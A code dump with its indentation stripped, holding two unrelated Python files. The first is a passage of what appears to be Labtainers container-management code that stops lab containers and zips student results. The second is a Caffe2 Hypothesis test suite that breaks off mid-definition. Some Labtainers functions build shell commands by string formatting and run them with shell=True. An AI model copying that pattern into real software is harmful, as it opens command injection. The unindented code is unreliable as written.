# Do not need to check network name "bridge"
if network_name != "bridge" and network_name not in networklist:
networklist.append(network_name)
# Loop through each network (driver=bridge) to find if any that has the same subnet
for network_name in networklist:
command = "docker network inspect %s" % network_name
#logger.debug("Command to execute is (%s)" % command)
ps = subprocess.Popen(shlex.split(command), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
if len(output[1].decode('utf-8').strip()) > 0:
logger.error('Fail to inspect the network %s, error returned %s' % (network_name, output[1].decode('utf-8')))
sys.exit(1)
if len(output[0]) > 0:
network_result = json.loads(output[0].decode('utf-8'))
if len(network_result) != 0:
result = network_result[0]
ipam_config = result["IPAM"]["Config"][0]
for key in ipam_config:
if key == "Subnet":
ipam_config_subnet = ipam_config[key]
if subnet == ipam_config_subnet:
found_match_network = True
found_match_network_name = network_name
break
return found_match_network, found_match_network_name
def AllContainersRunning(container):
clone_names = GetContainerCloneNames(container)
for clone_full in clone_names:
if not IsContainerRunning(clone_full):
return False
return True
def IsContainerRunning(mycontainer_name):
cmd = 'docker ps -f id=%s' % mycontainer_name
try:
dumb = int(mycontainer_name, 16)
except:
cmd = 'docker ps -f name=%s' % mycontainer_name
try:
s = subprocess.check_output(shlex.split(cmd)).decode('utf-8')
except:
return False
if mycontainer_name in s:
return True
else:
return False
def ShouldBeRunning(start_config, container):
if start_config.multi_user is not None and start_config.multi_user != 'clones':
if start_config.multi_user == 'server' and container.client == 'yes':
return False
if start_config.multi_user == 'client' and container.client != 'yes':
return False
return True
def DoStopOne(start_config, labtainer_config, lab_path, name, container, zip_file_list, ignore_stop_error, results, keep_running):
labname = os.path.basename(lab_path)
#dumlog = os.path.join('/tmp', name+'.log')
#sys.stdout = open(dumlog, 'w')
#sys.stderr = sys.stdout
retval = True
mycontainer_name = container.full_name
container_user = container.user
container_password = container.password
mycontainer_image = container.image_name
haveContainer = AllContainersCreated(container)
logger.debug("AllContainersCreated for %s result (%s)" % (container.name, haveContainer))
# IsContainerCreated returned FAILURE if container does not exists
# error: can't stop non-existent container
if not haveContainer:
if ShouldBeRunning(start_config, container) and not ignore_stop_error:
logger.error("Container %s does not exist!\n" % mycontainer_name)
retval = False
elif container.tap == 'yes':
StopMyContainer(mycontainer_name, ignore_stop_error)
else:
clone_names = GetContainerCloneNames(container)
for mycontainer_name in clone_names:
if not IsContainerRunning(mycontainer_name):
if ShouldBeRunning(start_config, container):
if ignore_stop_error:
logger.debug("container %s not running\n" % (mycontainer_name))
else:
logger.error("container %s not running\n" % (mycontainer_name))
retval = False
continue
GatherOtherArtifacts(lab_path, name, mycontainer_name, container_user, container_password, ignore_stop_error)
# Before stopping a container, run 'Student.py'
# This will create zip file of the result
baseZipFilename, currentContainerZipFilename = CreateCopyChownZip(start_config, labtainer_config, name,
mycontainer_name, mycontainer_image, container_user, container_password, ignore_stop_error, keep_running)
if baseZipFilename is not None:
if currentContainerZipFilename is not None:
zip_file_list.append(currentContainerZipFilename)
else:
logger.debug('currentContainerZipFilename is None for container %s' % mycontainer_name)
logger.debug("baseZipFilename is (%s)" % baseZipFilename)
else:
logger.debug("baseZipFileName is None for container %s" % mycontainer_name)
#command = 'docker exec %s echo "%s\n" | sudo -S rmdir /tmp/.mylockdir 2>/dev/null' % (mycontainer_name, container_password)
command = 'docker exec %s sudo rmdir /tmp/.mylockdir 2>/dev/null' % (mycontainer_name)
os.system(command)
if not keep_running:
did_this = []
for mysubnet_name, mysubnet_ip in container.container_nets.items():
subnet_name = mysubnet_name
if ':' in mysubnet_name:
subnet_name = mysubnet_name.split(':')[0]
if subnet_name not in did_this:
disconnectNetworkResult = DisconnectNetworkFromContainer(mycontainer_name, subnet_name)
did_this.append(subnet_name)
# Stop the container
if not keep_running:
StopMyContainer(mycontainer_name, ignore_stop_error)
results.append(retval)
def SynchStop(start_config, run_container=None):
threads = []
now = datetime.datetime.now()
''' NOTE all prestop stdout will have same timestamp. '''
ts = now.strftime('%Y%m%d%H%M%S')
for name, container in start_config.containers.items():
if run_container is not None and container.full_name != run_container:
#print('not for me %s ' % run_container)
continue
clone_names = GetContainerCloneNames(container)
for mycontainer_name in clone_names:
t = threading.Thread(target=PreStop, args=[mycontainer_name, ts])
threads.append(t)
t.setName(name)
t.start()
logger.debug('prestop started on all')
for t in threads:
t.join()
logger.debug('joined %s' % t.getName())
def GatherZips(zip_file_list, labtainer_config, start_config, labname, lab_path):
mycwd = os.getcwd()
if len(zip_file_list) == 0:
logger.error('GatherZips called without any zips')
return
try:
base_filename = os.path.basename(zip_file_list[0])
except:
logger.error('No basefile found in %s' % zip_file_list[0])
return
baseZipFilename = base_filename.split('=')[0]
host_home_xfer = os.path.join(labtainer_config.host_home_xfer, labname)
username = getpass.getuser()
xfer_dir = "/home/%s/%s" % (username, host_home_xfer)
try:
os.makedirs(xfer_dir)
except:
pass
# Create docs.zip in xfer_dir if COLLECT_DOCS is "yes"
if start_config.collect_docs.lower() == "yes":
docs_zip_file = "%s/docs.zip" % xfer_dir
logger.debug("Zipping docs directory to %s" % docs_zip_file)
docs_path = '%s/docs' % lab_path
if os.path.isdir(docs_path):
docs_zip_filelist = glob.glob('%s/*' % docs_path)
logger.debug(docs_zip_filelist)
# docs.zip file
docs_zipoutput = zipfile.ZipFile(docs_zip_file, "w")
# Go to the docs_path
os.chdir(docs_path)
for docs_fname in docs_zip_filelist:
docs_basefname = os.path.basename(docs_fname)
docs_zipoutput.write(docs_basefname, compress_type=zipfile.ZIP_DEFLATED)
# Note: DO NOT remove after the file is zipped
docs_zipoutput.close()
# Add docs.zip into the zip_file_list
zip_file_list.append(docs_zip_file)
else:
logger.debug('no docs at %s' % docs_path)
# Combine all the zip files
logger.debug("zip_file_list is ")
logger.debug(zip_file_list)
logger.debug("baseZipFilename is (%s)" % baseZipFilename)
oldfile = "%s/%s.zip" % (xfer_dir, baseZipFilename)
if os.path.isfile(oldfile):
os.remove(oldfile)
combinedZipFilename = "%s/%s.lab" % (xfer_dir, baseZipFilename)
logger.debug("The combined zip filename is %s" % combinedZipFilename)
with open(combinedZipFilename, 'w') as fh:
fh.write('Foil click-happy students')
zipoutput = zipfile.ZipFile(combinedZipFilename, "a")
# Go to the xfer_dir
os.chdir(xfer_dir)
for fname in zip_file_list:
basefname = os.path.basename(fname)
zipoutput.write(basefname, compress_type=zipfile.ZIP_DEFLATED)
# Remove after the file is zipped
os.remove(basefname)
# Add count.json and labtainer.log (if they exist) to the zip file
count_path = LabCount.getPath('./', labname)
#print "count_path is %s" % count_path
if os.path.isfile(count_path):
parent = os.path.dirname(count_path)
os.chdir(mycwd)
os.chdir(parent)
fname = os.path.join('./', os.path.basename(count_path))
zipoutput.write(fname, compress_type=zipfile.ZIP_DEFLATED)
os.chdir(mycwd)
my_labtainer_log = os.path.join('./', 'labtainer.log')
if os.path.exists(my_labtainer_log):
zipoutput.write(my_labtainer_log, compress_type=zipfile.ZIP_DEFLATED)
zipoutput.close()
post_zip = os.path.join(lab_path, 'bin', 'postzip')
if os.path.isfile(post_zip):
cmd = "%s %s" % (post_zip, combinedZipFilename)
os.system(cmd)
os.chdir(mycwd)
def DoStop(start_config, labtainer_config, lab_path, ignore_stop_error, run_container=None, servers=None, clone_count=None, keep_running=False):
retval = True
labname = os.path.basename(lab_path)
logger.debug("DoStop Multiple Containers and/or multi-home networking, keep_running is %r" % keep_running)
SynchStop(start_config, run_container)
baseZipFilename = ""
zip_file_list = []
threads = []
results = []
for name, container in start_config.containers.items():
if run_container is not None and container.full_name != run_container:
#print('not for me %s ' % run_container)
continue
mycontainer_name = '%s.%s.student' % (labname, container.name)
t = threading.Thread(target=DoStopOne, args=(start_config, labtainer_config, lab_path,
name, container, zip_file_list, ignore_stop_error, results, keep_running))
threads.append(t)
t.setName(name)
t.start()
logger.debug('stopped all')
for t in threads:
t.join()
logger.debug('joined %s' % t.getName())
if not keep_running:
RemoveSubnets(start_config.subnets, ignore_stop_error)
if not ignore_stop_error:
if False in results:
logger.error('DoStopOne has at least one failure!')
sys.exit(1)
if len(zip_file_list) == 0:
if ignore_stop_error:
logger.debug('No zip files found')
else:
logger.error('No zip files found')
return None
''' Check for empty email identifier '''
if zip_file_list[0].startswith('.'):
lgr.error('Missing email for student, cannot gather artifacts')
return None
GatherZips(zip_file_list, labtainer_config, start_config, labname, lab_path)
return retval
# ignore_stop_error - set to 'False' : do not ignore error
# ignore_stop_error - set to 'True' : ignore certain error encountered since it might not even be an error
# such as error encountered when trying to stop non-existent container
def StopLab(lab_path, ignore_stop_error, run_container=None, servers=None, clone_count=None, keep_running=False):
labname = os.path.basename(lab_path)
if labname.endswith('labtainer.grader'):
return None
myhomedir = os.environ['HOME']
logger.debug("keep_running is %r" % keep_running)
logger.debug("ParseStartConfig for %s" % labname)
isValidLab(lab_path)
labtainer_config, start_config = GetBothConfigs(lab_path, logger, servers, clone_count)
host_home_xfer = os.path.join(labtainer_config.host_home_xfer, labname)
# Check existence of /home/$USER/$HOST_HOME_XFER directory - create if necessary
host_xfer_dir = '%s/%s' % (myhomedir, host_home_xfer)
CreateHostHomeXfer(host_xfer_dir)
if DoStop(start_config, labtainer_config, lab_path, ignore_stop_error, run_container=run_container,
servers=servers, clone_count=clone_count, keep_running=keep_running):
# Inform user where results are stored
print("Results stored in directory: %s" % host_xfer_dir)
syncdir = os.path.join(os.getenv('LABTAINER_DIR'), 'scripts','labtainer-student', '.tmp', labname, 'sync')
try:
os.rmdir(syncdir)
except:
pass
return host_xfer_dir
def DoMoreterm(lab_path, container_name, clone_num=None, alt_name=None):
labname = os.path.basename(lab_path)
mycwd = os.getcwd()
myhomedir = os.environ['HOME']
isValidLab(lab_path)
labtainer_config, start_config = GetBothConfigs(lab_path, logger)
if container_name not in start_config.containers:
logger.error("Container %s not found. Container must be one of the following:" % container_name)
for container_name in start_config.containers:
print('\t%s' % container_name)
print("Usage: moreterm.py <lab> <container>")
return False
logger.debug('num terms is %d' % start_config.containers[container_name].terminals)
if clone_num is None:
mycontainer_name = '%s.%s.student' % (labname, container_name)
else:
mycontainer_name = '%s.%s-%d.student' % (labname, container_name, clone_num)
if alt_name is not None:
mycontainer_name = alt_name
if not IsContainerCreated(mycontainer_name):
logger.error('DoMoreTerm container %s not found' % mycontainer_name)
sys.exit(1)
if not IsContainerRunning(mycontainer_name):
logger.error("Container %s is not running!\n" % (mycontainer_name))
sys.exit(1)
if start_config.containers[container_name].terminals == -1:
logger.debug("No terminals supported for %s" % container_name)
return False
else:
spawn_command = "gnome-terminal --profile=labtainers -- docker exec -it %s bash -l -c bash > /dev/null 2>&1 &" % mycontainer_name
logger.debug("spawn_command is (%s)" % spawn_command)
os.system(spawn_command)
return True
def DoTransfer(lab_path, container_name, filename, direction):
'''TBD this is not tested and likey broken'''
labname = os.path.basename(lab_path)
mycwd = os.getcwd()
myhomedir = os.environ['HOME']
logger.debug("current working directory for %s" % mycwd)
logger.debug("current user's home directory for %s" % myhomedir)
logger.debug("ParseStartConfig for %s" % labname)
isValidLab(lab_path)
labtainer_config, start_config = GetBothConfigs(lab_path, logger)
host_home_xfer = os.path.join(labtainer_config.host_home_xfer, labname)
logger.debug('num terms is %d' % start_config.containers[container_name].terminals)
host_xfer_dir = '%s/%s' % (myhomedir, host_home_xfer)
mycontainer_name = '%s.%s.student' % (labname, container_name)
if not IsContainerCreated(mycontainer_name):
logger.error('container %s not found' % mycontainer_name)
sys.exit(1)
if not IsContainerRunning(mycontainer_name):
logger.error("Container %s is not running!\n" % (mycontainer_name))
sys.exit(1)
container_user = ""
for name, container in start_config.containers.items():
if mycontainer_name == container.full_name:
container_user = container.user
if direction == "TOCONTAINER":
# Transfer from host to container
filename_path = '%s/%s' % (host_xfer_dir, filename)
logger.debug("File to transfer from host is (%s)" % filename_path)
if os.path.exists(filename_path) and os.path.isfile(filename_path):
# Copy file and chown it
command = 'docker cp %s %s:/home/%s/' % (filename_path, mycontainer_name, container_user)
#logger.debug("Command to execute is (%s)" % command)
result = subprocess.call(command, shell=True)
logger.debug("Result of subprocess.call DoTransfer copy (TOCONTAINER) file (%s) is %s" % (filename_path, result))
if result == FAILURE:
logger.error("Failed to copy file to container %s!\n" % mycontainer_name)
sys.exit(1)
command = 'docker exec %s sudo chown %s:%s /home/%s/%s' % (mycontainer_name, container_user, container_user, container_user, filename)
#logger.debug("Command to execute is (%s)" % command)
result = subprocess.call(command, shell=True)
logger.debug("Result of subprocess.call DoTransfer chown file (%s) is %s" % (filename_path, result))
if result == FAILURE:
logger.error("Failed to set permission in container %s!\n" % mycontainer_name)
sys.exit(1)
else:
logger.error('Host does not have %s file' % filename_path)
sys.exit(1)
else:
# Transfer from container to host
command = 'docker cp %s:/home/%s/%s %s/' % (mycontainer_name, container_user, filename, host_xfer_dir)
#logger.debug("Command to execute is (%s)" % command)
result = subprocess.call(command, shell=True)
logger.debug("Result of subprocess.call DoTransfer copy (TOHOST) file (%s) is %s" % (filename, result))
if result == FAILURE:
logger.error("Failed to copy file from container %s!\n" % mycontainer_name)
sys.exit(1)
def CopyFilesToHost(lab_path, container_name, full_container_name, container_user):
labname = os.path.basename(lab_path)
isValidLab(lab_path)
config_path = os.path.join(lab_path,"config")
copy_path = os.path.join(config_path,"files_to_host.config")
#logger.debug('CopyFilesToHost %s %s %s' % (labname, container_name, full_container_name))
#logger.debug('CopyFilesToHost copypath %s' % copy_path)
if os.path.isfile(copy_path):
with open(copy_path) as fh:
for line in fh:
if not line.strip().startswith('#'):
try:
os.mkdir(os.path.join(os.getcwd(), labname))
except OSError as e:
#logger.error('could not mkdir %s in %s %s' % (labname, os.getcwd(),str(e)))
pass
container, file_name = line.split(':')
if container == container_name:
dest = os.path.join(os.getcwd(), labname, file_name)
command = 'docker cp %s:/home/%s/%s %s' % (full_container_name, container_user,
file_name.strip(), dest)
#logger.debug("Command to execute is (%s)" % command)
result = subprocess.call(command, shell=True)
logger.debug("Result of subprocess.call DoTransfer copy (TOHOST) file (%s) is %s" % (file_name,
result))
if result == FAILURE:
logger.error("Failed to copy file from container %s!\n" % full_container_name)
sys.exit(1)
def GetContainerId(image):
command = "docker ps"
#logger.debug("Command to execute is (%s)" % command)
ps = subprocess.Popen(shlex.split(command), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
if len(output[1].strip()) > 0:
logger.error('GetContainerId, Failed to get a list of running containers, error returned %s' % output[1].decode('utf-8'))
sys.exit(1)
if len(output[0]) > 0:
docker_ps_output = output[0].decode('utf-8').splitlines()
for each_line in docker_ps_output:
# Skip empty line or the "CONTAINER ID" line - the header line returned by "docker ps"
current_line = each_line.strip()
parts = current_line.split()
if parts[1].startswith(image):
return parts[0]
return None
|
hypothesis_test.py
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import copy
import time
from functools import partial, reduce
from future.utils import viewitems, viewkeys
from hypothesis import assume, given, settings
import hypothesis.strategies as st
import unittest
from caffe2.python import core, workspace, tt_core, dyndep
import caffe2.python.hypothesis_test_util as hu
from caffe2.proto.caffe2_pb2 import TensorProto
dyndep.InitOpsLibrary('@/caffe2/caffe2/fb/optimizers:sgd_simd_ops')
def sigmoid(x):
return 1.0 / (1.0 + np.exp(-x))
@st.composite
def _tensor_and_prefix(draw, dtype, elements, min_dim=1, max_dim=4, **kwargs):
dims_ = draw(
st.lists(hu.dims(**kwargs), min_size=min_dim, max_size=max_dim))
extra_ = draw(
st.lists(hu.dims(**kwargs), min_size=min_dim, max_size=max_dim))
assume(len(dims_) + len(extra_) < max_dim)
return (draw(hu.arrays(dims_ + extra_, dtype, elements)),
draw(hu.arrays(extra_, dtype, elements)))
def _tensor_and_indices(min_dim=1, max_dim=4, dtype=np.float32,
elements=None, **kwargs):
""" generates a tensor and a list of indices of larger tensor of same dim"""
data_dims_ = st.lists(hu.dims(**kwargs), min_size=min_dim, max_size=max_dim)
original_dim = st.integers(min_value=2, max_value=10)
return st.tuples(data_dims_, original_dim).flatmap(lambda pair: st.tuples(
st.just(pair[1]), # original dimension
hu.arrays(pair[0], dtype, elements), # data tensor
hu.arrays(pair[0][0], dtype=np.int64, elements=st.integers(
min_value=0, max_value=pair[1] - 1)),
))
_NUMPY_TYPE_TO_ENUM = {
np.float32: core.DataType.FLOAT,
np.int32: core.DataType.INT32,
np.bool: core.DataType.BOOL,
np.uint8: core.DataType.UINT8,
np.int8: core.DataType.INT8,
np.uint16: core.DataType.UINT16,
np.int16: core.DataType.INT16,
np.int64: core.DataType.INT64,
np.float64: core.DataType.DOUBLE,
}
def _dtypes(dtypes=None):
dtypes = dtypes if dtypes else [np.int32, np.int64, np.float32]
return st.sampled_from(dtypes)
def _test_binary(name, ref, filter_=None, gcs=hu.gcs,
test_gradient=False, allow_inplace=False, dtypes=_dtypes):
@given(
inputs=dtypes().flatmap(
lambda dtype: hu.tensors(
n=2, dtype=dtype,
elements=hu.elements_of_type(dtype, filter_=filter_))),
out=st.sampled_from(('Y', 'X1', 'X2') if allow_inplace else ('Y',)),
**gcs)
@settings(max_examples=3, timeout=100)
def test_binary(self, inputs, out, gc, dc):
op = core.CreateOperator(name, ["X1", "X2"], [out])
X1, X2 = inputs
self.assertDeviceChecks(dc, op, [X1, X2], [0])
# We only do gradient check with float32 types.
if test_gradient and X1.dtype == np.float32:
self.assertGradientChecks(gc, op, [X1, X2], 0, [0])
self.assertReferenceChecks(gc, op, [X1, X2], ref)
return test_binary
def _test_binary_broadcast(name, ref, filter_=None,
gcs=hu.gcs, allow_inplace=False, dtypes=_dtypes):
@given(
inputs=dtypes().flatmap(lambda dtype: _tensor_and_prefix(
dtype=dtype,
elements=hu.elements_of_type(dtype, filter_=filter_))),
in_place=(st.booleans() if allow_inplace else st.just(False)),
**gcs)
@settings(max_examples=3, timeout=100)
def test_binary_broadcast(self, inputs, in_place, gc, dc):
op = core.CreateOperator(
name, ["X1", "X2"], ["X1" if in_place else "Y"], broadcast=1)
X1, X2 = inputs
self.assertDeviceChecks(dc, op, [X1, X2], [0])
def cast_ref(x, y):
return (np.array(ref(x, y)[0], dtype=x.dtype), )
# gradient not implemented yet
# self.assertGradientChecks(gc, op, [X1, X2], 0, [0])
self.assertReferenceChecks(gc, op, [X1, X2], cast_ref)
return test_binary_broadcast
class TestOperators(hu.HypothesisTestCase):
def test_comparison_ops(self):
ops = {"LT": lambda x1, x2: [x1 < x2],
"LE": lambda x1, x2: [x1 <= x2],
"GT": lambda x1, x2: [x1 > x2],
"GE": lambda x1, x2: [x1 >= x2]}
for name, ref in viewitems(ops):
_test_binary(name, ref, gcs=hu.gcs_cpu_only)(self)
_test_binary_broadcast(name, ref, gcs=hu.gcs_cpu_only)(self)
@given(inputs=hu.tensors(n=2), in_place=st.booleans(), **hu.gcs)
def test_sum(self, inputs, in_place, gc, dc):
op = core.CreateOperator("Sum", ["X1", "X2"],
["Y" if not in_place else "X1"])
X1, X2 = inputs
self.assertDeviceChecks(dc, op, [X1, X2], [0])
self.assertGradientChecks(gc, op, [X1, X2], 0, [0])
@given(inputs=hu.tensors(n=2, min_dim=2, max_dim=2), **hu.gcs_cpu_only)
def test_row_mul(self, inputs, gc, dc):
op = core.CreateOperator("RowMul", ["X1", "X2"], ["Y"])
X1, Xtmp = inputs
X2 = Xtmp[:, 0]
def ref(x, y):
ret = np.zeros(shape=x.shape, dtype=x.dtype)
for i in range(y.size):
ret[i, ] = x[i, ] * y[i]
return [ret]
self.assertDeviceChecks(dc, op, [X1, X2], [0])
for i in range(2):
self.assertGradientChecks(gc, op, [X1, X2], i, [0])
self.assertReferenceChecks(gc, op, [X1, X2], ref)
@given(inputs=hu.tensors(n=2), **hu.gcs_cpu_only)
def test_max(self, inputs, gc, dc):
op = core.CreateOperator("Max", ["X1", "X2"], ["Y"])
X1, X2 = inputs
# Make X1 and X2 far from each other, since X1=X2 is not differentiable
# and the step size of gradient checker is 0.05
X1[np.logical_and(X1 >= X2 - 0.05, X1 <= X2)] -= 0.05
X1[np.logical_and(X1 <= X2 + 0.05, X1 >= X2)] += 0.05
self.assertDeviceChecks(dc, op, [X1, X2], [0])
for i in range(2):
self.assertGradientChecks(gc, op, [X1, X2], i, [0])
def elementwise_max(X, Y):
return [np.maximum(X, Y)]
self.assertReferenceChecks(gc, op, [X1, X2], elementwise_max)
def test_add(self):
def ref(x, y):
return (x + y, )
_test_binary("Add", ref, test_gradient=True)(self)
_test_binary_broadcast("Add", ref)(self)
def test_sub(self):
def ref(x, y):
return (x - y, )
# TODO(jiayq): enable gradient test when implemented.
_test_binary("Sub", ref, test_gradient=True)(self)
_test_binary_broadcast("Sub", ref)(self)
def test_mul(self):
def ref(x, y):
return (x * y, )
_test_binary("Mul", ref, test_gradient=True)(self)
_test_binary_broadcast("Mul", ref)(self)
def test_div(self):
def ref(x, y):
return (x / y, )
def non_zero(x):
return abs(x) > 10e-5
def div_dtypes():
return st.sampled_from([np.float32, np.float64])
_test_binary(
"Div", ref, filter_=non_zero, test_gradient=True,
dtypes=div_dtypes, gcs=hu.gcs_cpu_only
)(self)
_test_binary(
"Div", ref, filter_=non_zero, test_gradient=False,
dtypes=div_dtypes
)(self)
_test_binary_broadcast(
"Div", ref, filter_=non_zero, dtypes=div_dtypes)(self)
@given(X=hu.tensor(), in_place=st.booleans(), **hu.gcs)
def test_negative(self, X, in_place, gc, dc):
op = core.CreateOperator("Negative", ["X"],
["Y" if not in_place else "X"])
self.assertDeviceChecks(dc, op, [X], [0])
self.assertGradientChecks(gc, op, [X], 0, [0])
@given(X=hu.tensor(), **hu.gcs)
def test_tanh(self, X, gc, dc):
op = core.CreateOperator("Tanh", "X", "Y")
self.assertDeviceChecks(dc, op, [X], [0])
self.assertGradientChecks(gc, op, [X], 0, [0])
@given(X=hu.tensor(), **hu.gcs)
def test_averaged_loss(self, X, gc, dc):
op = core.CreateOperator("AveragedLoss", ["X"], ["loss"])
self.assertDeviceChecks(dc, op, [X], [0])
self.assertGradientChecks(gc, op, [X], 0, [0])
@given(X=hu.tensor(), inplace=st.booleans(), **hu.gcs)
def test_softsign(self, X, inplace, gc, dc):
op = core.CreateOperator("Softsign", ["X"], ["X" if inplace else "Y"])
def softsign(X):
return (X / (1 + np.abs(X)),)
self.assertDeviceChecks(dc, op, [X], [0])
self.assertReferenceChecks(gc, op, [X], softsign)
if inplace:
with self.assertRaises(Exception):
self.assertGradientChecks(gc, op, [X], 0, [0])
else:
self.assertGradientChecks(gc, op, [X], 0, [0])
@given(
device_options=st.lists(
min_size=2,
max_size=4,
elements=st.sampled_from(hu.expanded_device_options)),
set_seed=st.booleans())
def test_random_seed_behaviour(self, device_options, set_seed):
# Assume we are always operating on CUDA or CPU, since RNG is
# inconsistent between CPU and GPU.
device_options = copy.deepcopy(device_options)
assume(len({do.device_type for do in device_options}) == 1)
if set_seed:
for do in device_options:
do.random_seed = 1000
def run(do):
# Reset each time because 'Y' may already exist in the workspace
# on a different device
workspace.ResetWorkspace()
ws = workspace.C.Workspace()
op = core.CreateOperator(
"XavierFill", [], ["Y"],
device_option=do,
shape=[2])
ws.run(op)
return ws.blobs["Y"].fetch()
ys = [run(do) for do in device_options]
for y in ys[1:]:
if set_seed:
np.testing.assert_array_equal(ys[0], y)
else:
with self.assertRaises(AssertionError):
np.testing.assert_array_equal(ys[0], y)
@given(axis=st.integers(min_value=1, max_value=4),
num_output=st.integers(min_value=4, max_value=8),
engine=st.sampled_from(["", "PACKED"]),
**hu.gcs)
def test_fully_connected_axis(self, axis, num_output, engine, gc, dc):
np.random.seed(1)
X = np.random.randn(1, 2, 3, 2, 1).astype(np.float32)
def prod(xs):
p = 1
for x in xs:
p *= x
return p
K = prod(list(X.shape)[axis:])
N = num_output
W = np.random.randn(N, K).astype(np.float32)
b = np.random.randn(N).astype(np.float32)
op = core.CreateOperator(
"FC",
["X", "W", "b"],
["Y"],
engine=engine,
axis=axis)
for name, param in [("X", X), ("W", W), ("b", b)]:
self.ws.create_blob(name).feed(param)
self.ws.run(op)
Y = self.ws.blobs["Y"].fetch()
self.assertEqual(list(Y.shape), list(X.shape)[:axis] + [N])
inputs = [X, W, b]
self.assertDeviceChecks(dc, op, inputs, [0])
for param, _ in enumerate(inputs):
self.assertGradientChecks(gc, op, inputs, param, [0])
@unittest.skipIf(not workspace.has_gpu_support,
"Skipping test due to no gpu present.")
@given(hidden_size=st.integers(min_value=1, max_value=3),
num_layers=st.integers(min_value=1, max_value=3),
bidirectional=st.just(False), # TODO
rnn_mode=st.sampled_from(["lstm"]), # TODO: "gru"
input_mode=st.sampled_from(["linear"]),
dropout=st.floats(min_value=1.0, max_value=1.0),
T=st.integers(min_value=2, max_value=6),
N=st.integers(min_value=1, max_value=4),
D=st.integers(min_value=1, max_value=4))
def test_recurrent(self, hidden_size, num_layers, bidirectional, rnn_mode,
input_mode, dropout, T, N, D):
# Random seed, this one happens to pass
seed = 1234
np.random.seed(seed)
input_weight_size = hidden_size * D
upper_layer_input_weight_size = hidden_size * hidden_size
recurrent_weight_size = hidden_size * hidden_size
input_bias_size = hidden_size
recurrent_bias_size = hidden_size
num_directions = 2 if bidirectional else 1
first_layer_sz = input_weight_size + recurrent_weight_size + \
input_bias_size + recurrent_bias_size
upper_layer_sz = upper_layer_input_weight_size + \
recurrent_weight_size + input_bias_size + \
recurrent_bias_size
total_sz = 4 * (first_layer_sz + (num_layers - 1) * upper_layer_sz)
total_sz *= num_directions
W = np.random.rand(total_sz).astype(np.float32)
self.ws.create_blob("WEIGHT").feed(W, device_option=hu.gpu_do)
op = core.CreateOperator(
"Recurrent",
["INPUT", "HIDDEN_INPUT", "CELL_INPUT", "WEIGHT"],
["OUTPUT", "HIDDEN_OUTPUT", "CELL_OUTPUT",
"RNN_SCRATCH", "DROPOUT_STATES"],
hidden_size=hidden_size,
bidirectional=bidirectional,
rnn_mode=rnn_mode,
dropout=dropout,
input_mode=input_mode,
num_layers=num_layers,
seed=seed,
engine="CUDNN")
X = np.random.randn(T, N, D).astype(np.float32)
self.ws.create_blob("INPUT").feed(X, device_option=hu.gpu_do)
W = self.ws.blobs["WEIGHT"].fetch()
H = np.random.randn(
num_layers, N, hidden_size * num_directions).astype(
np.float32)
C = np.random.randn(
num_layers, N, hidden_size * num_directions).astype(
np.float32) if rnn_mode == "lstm" else \
np.empty((1,)).astype(np.float32) # unused in GRU
inputs = [X, H, C, W]
input_idxs = [i for (i, _) in enumerate(inputs)] \
if rnn_mode == "lstm" else [0, 1, 3] # ignore C
for input_idx in input_idxs:
self.assertGradientChecks(
hu.gpu_do, op, inputs, input_idx, [0],
stepsize=0.01, threshold=0.01)
@given(ndim=st.integers(1, 4),
axis=st.integers(0, 3),
add_axis=st.integers(0, 1),
num_inputs=st.integers(2, 4), **hu.gcs)
def test_depth_concat(self, ndim, axis, add_axis, num_inputs, gc, dc):
assume(axis < ndim)
input_names = ['X0', 'X1', 'X2', 'X3'][:num_inputs]
shape = [2, 3, 5, 7][:ndim]
individual_dims = [1, 2, 3, 4, 5][:num_inputs]
inputs = []
for i in range(num_inputs):
if add_axis == 0:
# Sets a unique dim and create the input.
shape[axis] = individual_dims[i]
inputs.append(np.random.randn(*shape).astype(np.float32))
op = core.CreateOperator("Concat", input_names, ["Y", "Y_dims"],
axis=axis, add_axis=add_axis)
self.assertDeviceChecks(dc, op, inputs, [0])
for i in range(num_inputs):
self.assertGradientChecks(gc, op, inputs, i, [0])
# Reference
def depth_concat(*inputs):
inputs = list(inputs)
if add_axis:
for i in range(len(inputs)):
inputs[i] = np.expand_dims(inputs[i], axis)
input_dims = np.array([np.shape(x)[axis] for x in inputs])
return [np.concatenate(inputs, axis=axis), input_dims]
self.assertReferenceChecks(gc, op, inputs, depth_concat)
@given(num_inputs=st.integers(2, 4),
order=st.sampled_from([("NCHW", 1), ("NHWC", 3)]),
**hu.gcs)
def test_depth_concat_with_order(self, num_inputs, order, gc, dc):
input_names = ['X0', 'X1', 'X2', 'X3'][:num_inputs]
shape = [2, 3, 5, 7]
individual_dims = [1, 2, 3, 4][:num_inputs]
inputs = []
for i in range(num_inputs):
# Sets a unique dim and create the input.
shape[order[1]] = individual_dims[i]
inputs.append(np.random.rand(*shape).astype(np.float32))
op = core.CreateOperator("Concat", input_names, ["Y", "Y_dims"],
order=order[0])
self.assertDeviceChecks(dc, op, inputs, [0])
for i in range(num_inputs):
self.assertGradientChecks(gc, op, inputs, i, [0])
# Reference
def depth_concat_with_order(*inputs):
inputs = list(inputs)
axis = order[1]
input_dims = np.array([np.shape(x)[axis] for x in inputs])
return [np.concatenate(inputs, axis=axis), input_dims]
self.assertReferenceChecks(gc, op, inputs, depth_concat_with_order)
@given(X=hu.arrays(dims=[5, 2],
elements=st.floats(min_value=0.0, max_value=10.0)),
**hu.gcs_cpu_only)
def test_last_n_windows(self, X, gc, dc):
workspace.FeedBlob('input', X)
workspace.FeedBlob('next', np.array(0, dtype=np.int32))
workspace.CreateBlob('output')
collect_net = core.Net('collect_net')
collect_net.LastNWindowCollector(
['output', 'next', 'input'],
['output', 'next'],
num_to_collect=7,
)
plan = core.Plan('collect_data')
plan.AddStep(core.execution_step('collect_data',
[collect_net], num_iter=2))
workspace.RunPlan(plan)
output = workspace.FetchBlob('output')
inputs = workspace.FetchBlob('input')
new_output = np.zeros([7, inputs.shape[1]])
for i in range(inputs.shape[0] * 2):
new_output[i % 7] = inputs[i % inputs.shape[0]]
import numpy.testing as npt
npt.assert_almost_equal(output, new_output, decimal=5)
@given(dtype=st.sampled_from([np.float32, np.float64, np.int32, np.bool]))
def test_print(self, dtype):
data = np.random.permutation(6).astype(dtype)
self.ws.create_blob("data").feed(data)
op = core.CreateOperator("Print", "data", [])
self.ws.run(op)
@given(inputs=hu.tensors(n=2),
in_place=st.booleans(),
